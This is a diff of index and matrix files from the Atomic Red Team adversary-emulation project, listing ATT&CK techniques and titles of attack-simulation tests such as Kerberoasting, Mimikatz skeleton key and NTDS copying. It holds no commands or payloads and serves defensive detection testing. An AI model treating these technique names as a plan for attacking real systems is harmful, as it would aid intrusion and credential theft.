- T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.011 Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md)
- Atomic Test #1: Application Shim Installation [windows]
@@ -1346,9 +1338,7 @@
- [T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.018 Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md)
- Atomic Test #1: Python Startup Hook - atomic_hook.pth (Windows) [windows]
- Atomic Test #2: Python Startup Hook - usercustomize.py (Windows) [windows]
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1197 BITS Jobs](../../T1197/T1197.md)
- Atomic Test #1: Bitsadmin Download (cmd) [windows]
@@ -1360,8 +1350,7 @@
- [T1546.002 Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md)
- Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
- T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.001 Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md)
- Atomic Test #1: Skeleton Key via Mimikatz [windows]
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1668 Exclusive Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1394,7 +1383,7 @@
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1132.001 Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md)
- Atomic Test #3: XOR Encoded data. [windows]
- T1568.002 Dynamic Resolution: Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1071.004 Application Layer Protocol: DNS](../../T1071.004/T1071.004.md)
- Atomic Test #1: DNS Large Query Volume [windows]
- Atomic Test #2: DNS Regular Beaconing [windows]
@@ -1421,8 +1410,7 @@
- Atomic Test #13: Splashtop Execution [windows]
- Atomic Test #14: Splashtop Streamer Execution [windows]
- Atomic Test #15: Microsoft App Quick Assist Execution [windows]
- [T1659 Content Injection](../../T1659/T1659.md)
- Atomic Test #2: MITM Proxy Injection (Windows) [windows]
- T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1572 Protocol Tunneling](../../T1572/T1572.md)
- Atomic Test #1: DNS over HTTPS Large Query Volume [windows]
@@ -1517,7 +1505,6 @@
- Atomic Test #7: Windows Screencapture [windows]
- Atomic Test #8: Windows Screen Capture (CopyFromScreen) [windows]
- Atomic Test #9: Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted [windows]
- Atomic Test #10: RDP Bitmap Cache Extraction via bmc-tools [windows]
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #1: Input Capture [windows]
@@ -1774,8 +1761,7 @@
- [T1555.004 Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md)
- Atomic Test #1: Access Saved Credentials via VaultCmd [windows]
- Atomic Test #2: WinPwn - Loot local Credentials - Invoke-WCMDump [windows]
- [T1556.001 Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md)
- Atomic Test #1: Skeleton Key via Mimikatz [windows]
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1003.003 OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md)
@@ -1788,8 +1774,6 @@
- Atomic Test #7: Create Volume Shadow Copy with Powershell [windows]
- Atomic Test #8: Create Symlink to Volume Shadow Copy [windows]
- Atomic Test #9: Create Volume Shadow Copy with diskshadow [windows]
- Atomic Test #10: Copy NTDS in low level NTFS acquisition via MFT parsing [windows]
- Atomic Test #11: Copy NTDS in low level NTFS acquisition via fsutil [windows]
- [T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting](../../T1558.003/T1558.003.md)
- Atomic Test #1: Request for service tickets [windows]
- Atomic Test #2: Rubeus kerberoast [windows]
@@ -1877,8 +1861,6 @@
- Atomic Test #1: System Service Discovery [windows]
- Atomic Test #2: System Service Discovery - net.exe [windows]
- Atomic Test #4: Get-Service Execution [windows]
- Atomic Test #6: System Service Discovery - Windows Scheduled Tasks (schtasks) [windows]
- Atomic Test #7: System Service Discovery - Services Registry Enumeration [windows]
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #4: Packet Capture Windows Command Prompt [windows]
- Atomic Test #5: Windows Internal Packet Capture [windows]
@@ -1972,8 +1954,7 @@
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
- Atomic Test #1: System Network Connections Discovery [windows]
- Atomic Test #2: System Network Connections Discovery with PowerShell [windows]
- Atomic Test #3: System Network Connections Discovery via PowerShell (Process Mapping) [windows]
- Atomic Test #7: System Discovery using SharpView [windows]
- Atomic Test #4: System Discovery using SharpView [windows]
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1654 Log Enumeration](../../T1654/T1654.md)
- Atomic Test #1: Get-EventLog To Enumerate Windows Security Log [windows]
@@ -2104,8 +2085,7 @@
- Atomic Test #10: Akira Ransomware drop Files with .akira Extension and Ransomnote [windows]
- T1667 Email Bombing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1496 Resource Hijacking](../../T1496/T1496.md)
- Atomic Test #2: Windows - Simulate CPU Load with PowerShell [windows]
- T1496 Resource Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1485 Data Destruction](../../T1485/T1485.md)
- Atomic Test #1: Windows - Overwrite file with SysInternals SDelete [windows]
@@ -2125,7 +2105,6 @@
- Atomic Test #9: Disable System Restore Through Registry [windows]
- Atomic Test #10: Windows - vssadmin Resize Shadowstorage Volume [windows]
- Atomic Test #11: Modify VSS Service Permissions [windows]
- Atomic Test #13: Windows - Delete Volume Shadow Copies via Diskshadow [windows]
- T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
- Atomic Test #1: Shutdown System - Windows [windows]
@@ -2150,8 +2129,7 @@
- [T1195 Supply Chain Compromise](../../T1195/T1195.md)
- Atomic Test #1: Octopus Scanner Malware Open Source Supply Chain [windows]
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1659 Content Injection](../../T1659/T1659.md)
- Atomic Test #2: MITM Proxy Injection (Windows) [windows]
- T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
- Atomic Test #2: Activate Guest Account [windows]
atomics/Indexes/Matrices/esxi-matrix.md
+1 -1
View File
@@ -2,7 +2,7 @@
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job: Cron [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerading: Match Legitimate Name or Location [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Network Configuration Discovery: Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services: SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Staged: Local Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encoding: Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ESXi Administration Command [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job: Cron [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job: Cron [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery: Local Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution: Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ESXi Administration Command [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job: Cron [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job: Cron [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery: Local Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Indicator Removal on Host: Clear Command History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Information Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Credential Stuffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Virtual Machine Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Access Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: Bash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create Account: Local Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | System Network Configuration Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
atomics/Indexes/Matrices/linux-matrix.md
+7 -7
View File
@@ -3,14 +3,14 @@
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | Remote Services:VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [System Network Configuration Discovery: Internet Connection Discovery](../../T1016.001/T1016.001.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services: SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Dynamic Resolution: Domain Generation Algorithms](../../T1568.002/T1568.002.md) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | [Device Driver Discovery](../../T1652/T1652.md) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services: SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Domain Account](../../T1087.002/T1087.002.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Services: Systemctl](../../T1569.003/T1569.003.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Content Injection](../../T1659/T1659.md) | Input Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Service Stop](../../T1489/T1489.md) |
